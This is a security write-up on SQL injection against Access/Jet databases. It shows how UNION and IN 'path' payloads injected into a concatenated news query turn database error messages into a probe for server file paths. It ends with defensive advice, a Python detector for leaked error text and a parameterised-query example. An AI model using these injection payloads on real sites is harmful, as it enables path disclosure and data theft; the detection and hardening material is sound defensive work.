Another Access vulnerability discovery: vulnerability research

Source: Internet
Author: User
Tags: odbc, ole, sql injection
SQL injection is a hot topic right now, and many new injection techniques are being dug up. Using system error messages to reveal paths is one of the popular ones, so today I will add my own contribution.

The tests in this example apply to Access (MS SQL Server has no equivalent query that takes a file path). Access has a statement that can import a table from a source database into a target database.

For example: mysource.mdb (admin table) -> mydestination.mdb

If you want to create a new table in an existing external database, you can use the IN keyword. The SELECT INTO statement returns an error message if the external database does not exist or if the table already exists.

SELECT * INTO tblnewcustomers IN 'C:\Customers.mdb' FROM tblcustomers

Turning this over, my first idea was to apply it through a subquery and rewrite the statement as follows.

A typical vulnerable statement looks like SELECT * FROM news WHERE id=" & request("id"), which can be injected. The following demonstrations are tested against SELECT * FROM news WHERE id=" & request("id"). For convenience, the statements are written directly in the form in which the SQL is executed:

SELECT * FROM news WHERE id=3 AND SELECT * INTO tblnewcustomers IN 'C:\Customers.mdb' FROM tblcustomers

Testing shows that the table import cannot be performed inside a subquery. The road is blocked again. Then I thought of UNION, the merge operator, and wondered whether it could be used.

Note: the UNION operator (applies to Access)

Although a union operation can also be considered a merge query, technically it is not a join; it is mentioned here because it can combine data from multiple sources into a single result set, which resembles some kinds of joins. Union operations are typically used to combine data from tables, SELECT statements, or queries, omitting any duplicate rows. All data sources must have the same number of fields, but those fields do not necessarily have to be of the same data types. Suppose we have an employee table with the same structure as the customer table, and we want to combine the two tables to get a single list of names and e-mail addresses.

SELECT [Last Name], [First Name], [E-mail] FROM tblcustomers UNION SELECT [Last Name], [First Name], [E-mail] FROM tblemployees

The union operation does not show any record that occurs in both tables. The query after UNION must have the same number of columns as the query before it. For example:

SELECT id, title FROM news WHERE id=3 UNION SELECT * FROM admin

If the column counts of the two queries differ, it returns:

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

This can be avoided by writing: SELECT id, title FROM news WHERE id=3 UNION SELECT 1,1 FROM admin. As long as the number of 1s equals the number of columns, the query runs.

Let's see whether the statement can be turned into:

SELECT * FROM news WHERE id=3 UNION SELECT * INTO tblnewcustomers IN 'C:\Customers.mdb' FROM tblcustomers

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] An action query cannot be used as a row source.

So this still fails: UNION only combines SELECT queries, and an action query cannot follow a UNION. Maybe this road is closed too, but I was not ready to give up.

Try the following:

SELECT * FROM news WHERE id=3 UNION SELECT * FROM admin.c

Returns:

Microsoft JET Database Engine error '80004005' Could not find file 'C:\WINNT\system32\admin.mdb'.

This proves that a path can be probed successfully; the same can be done with SELECT * FROM news WHERE id=3 AND 0<>(SELECT COUNT(*) FROM admin.c). But with this approach Access always assumes the .mdb suffix, and although there are ways to bypass that, it is too much trouble.

So I wondered whether there was an easier way, and recalled SELECT * INTO tblnewcustomers IN 'C:\Customers.mdb' FROM tblcustomers. Doesn't the IN keyword point at a path and file name? Could it be used on its own?

Then test:

SELECT * FROM news WHERE id=3 UNION SELECT * FROM admin IN 'C:\Customers.mdb'

The system reports:

Microsoft JET Database Engine error '80004005' Could not find file 'C:\Customers.mdb'.

Using:

SELECT * FROM news WHERE id=3 UNION SELECT * FROM admin IN 'C:\winnt\system32\cmd.exe'

The system reports:

Microsoft JET Database Engine error '80004005' The Microsoft Jet database engine cannot open the file 'C:\winnt\system32\CMD.EXE'. It is already opened exclusively by another user, or you need permission to view its data.

This method is more concise than the AND 0<>(SELECT COUNT(*) FROM admin) form. My guess was that if the file with the .mdb suffix is guessed correctly, the information is displayed correctly for the guessed path and file name. But what if the file you guess is not an .mdb? Here is what happens:

Run:

SELECT * FROM news WHERE id=3 UNION SELECT * FROM admin IN 'e:\www\include\connect.asp'

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'E:\WWW\include\connect.asp'

This proves that the path and file name were guessed correctly.
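Each of the three error texts above tells a different story about the probed path (file absent, file present but not openable as a database, file present but not an Access database), which is exactly why they are useful to an attacker and worth alerting on for a defender. The following Python is an added example, not code from the original article: it classifies HTTP response bodies by the Jet/ODBC messages quoted in the article and reports which path, if any, was disclosed. The regular expressions are mine, derived from the quoted messages, and the sample responses are constructed for illustration.

```python
"""Classify Microsoft Jet / ODBC error text leaked into HTTP responses.

Added example for this article (not code from the original post). The
signatures are derived from the error messages quoted in the article; the
sample responses below are constructed and are not real captures.
"""
import re
from typing import Optional

# Each signature maps a leaked message to what it tells the requester.  When
# the message echoes a file path, group 1 captures it so the alert can say
# which path was disclosed.
SIGNATURES = [
    (re.compile(r"Could not find file '([^']+)'", re.I),
     "path-probe: file does not exist"),
    (re.compile(r"cannot open the file '([^']+)'", re.I),
     "path-probe: file exists but is not openable as a database"),
    (re.compile(r"Unrecognized database format '([^']+)'", re.I),
     "path-probe: file exists but is not an Access database"),
    (re.compile(r"number of columns in the two selected tables or queries "
                r"of a union query do not match", re.I),
     "union-probe: column count mismatch"),
    (re.compile(r"An action query cannot be used as a row source", re.I),
     "union-probe: action query used in UNION"),
]

# Every Jet/ODBC error quoted in the article carries this provider error code.
JET_ERROR_CODE = "80004005"


def classify_response(body: str) -> Optional[dict]:
    """Return a finding if the body leaks a Jet/ODBC error, otherwise None.

    A site with a generic custom error page (the article's recommendation)
    never matches here, because no engine text reaches the client.
    """
    for pattern, meaning in SIGNATURES:
        m = pattern.search(body)
        if m:
            return {"meaning": meaning,
                    "path": m.group(1) if m.groups() else None}
    if JET_ERROR_CODE in body:
        return {"meaning": "jet-error: unclassified database error leaked",
                "path": None}
    return None


def scan(responses):
    """Run classify_response over (request, body) pairs and collect findings."""
    findings = []
    for request, body in responses:
        finding = classify_response(body)
        if finding:
            findings.append({"request": request, **finding})
    return findings


# Constructed sample traffic: one normal page, the probes from the article,
# a generic engine error, and a site that returns its own error page.
SAMPLE_RESPONSES = [
    ("GET /news.asp?id=3",
     "<html><body><h1>News item 3</h1></body></html>"),
    ("GET /news.asp?id=3+UNION+SELECT+*+FROM+admin+IN+'C:\\Customers.mdb'",
     "Microsoft JET Database Engine error '80004005' "
     "Could not find file 'C:\\Customers.mdb'."),
    ("GET /news.asp?id=3+UNION+SELECT+*+FROM+admin+IN+'e:\\www\\include\\connect.asp'",
     "Microsoft OLE DB Provider for ODBC Drivers error '80004005' "
     "[Microsoft][ODBC Microsoft Access Driver] "
     "Unrecognized database format 'E:\\WWW\\include\\connect.asp'"),
    ("GET /news.asp?id=3+UNION+SELECT+*+FROM+admin+IN+'C:\\winnt\\system32\\cmd.exe'",
     "Microsoft JET Database Engine error '80004005' The Microsoft Jet database "
     "engine cannot open the file 'C:\\winnt\\system32\\CMD.EXE'. It is already "
     "opened exclusively by another user, or you need permission to view its data."),
    ("GET /news.asp?id=3'",
     "Microsoft OLE DB Provider for ODBC Drivers error '80004005' "
     "Syntax error in string in query expression."),
    ("GET /news.asp?id=3'",
     "<html><body>An error occurred. Please try again later.</body></html>"),
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_RESPONSES):
        print(f"{finding['meaning']:60s} path={finding['path']}  <- {finding['request']}")
```

Run against real traffic this would sit on a reverse proxy or in a log pipeline; the interesting output for the article's scenario is the `path-probe` findings, since each one is a confirmed disclosure of whether a server-side path exists.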

In part, the flaws in Access itself are what let SQL injection keep producing new variants. But the larger part is that programmers are careless when writing code. Carefully filtering the values that go into SQL closes at least one door to injection; fixing the defects in Access itself is not in our hands, and there are many such holes. We therefore recommend hiding server error information: create your own error page so that server errors never appear on the page. That way there is no error message to refer to, only some text of your own.
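The two recommendations in that last paragraph, validating the value before it reaches the SQL and returning a fixed error page, look like this in code. This is an added example, not code from the original article: the article's code is classic ASP against Access, while this uses Python's sqlite3 as a stand-in engine (an assumption, chosen so the example runs anywhere) with a constructed news and admin schema. The vulnerable function keeps the article's concatenation pattern beside the hardened one.

```python
"""Vulnerable vs hardened lookup for the news.asp pattern in the article.

Added example, not code from the original post.  sqlite3 stands in for the
Access/Jet engine (an assumption); the schema and rows are constructed.
"""
import re
import sqlite3

# A news id is a plain positive integer; anything else is rejected up front.
_ID_RE = re.compile(r"^[0-9]{1,9}$")


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a public news table and a private admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER, title TEXT);
        CREATE TABLE admin (id INTEGER, name TEXT);
        INSERT INTO news VALUES (3, 'Hello world');
        INSERT INTO admin VALUES (1, 'administrator');
        """
    )
    return conn


def fetch_news_vulnerable(conn, raw_id: str):
    """Mirrors SELECT * FROM news WHERE id=" & request("id"): raw input is concatenated."""
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def fetch_news_hardened(conn, raw_id: str):
    """Reject anything that is not an integer, then bind the value as a parameter.

    Binding means the engine never parses the value as SQL, so a UNION or an
    IN 'path' clause in the input cannot change the statement.
    """
    if not _ID_RE.match(raw_id):
        raise ValueError("invalid id")
    return conn.execute(
        "SELECT id, title FROM news WHERE id=?", (int(raw_id),)
    ).fetchall()


def handle_request(conn, raw_id: str) -> str:
    """What the page returns: data, or a fixed message that carries no engine text."""
    try:
        rows = fetch_news_hardened(conn, raw_id)
    except (ValueError, sqlite3.Error):
        # Log the real exception server-side; the client sees only this string.
        return "An error occurred. Please try again later."
    return "\n".join(f"{i}: {t}" for i, t in rows) or "No such item"


if __name__ == "__main__":
    db = make_db()
    payload = "3 UNION SELECT id, name FROM admin"  # the UNION form used in the article
    print(fetch_news_vulnerable(db, payload))  # admin row returned alongside the news row
    print(handle_request(db, payload))          # rejected; only the generic message
    print(handle_request(db, "3"))
```

The integer check and the bound parameter are independent defences: the check gives a clean rejection path before any database work, and the parameter protects the statement even if some future code path skips the check.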
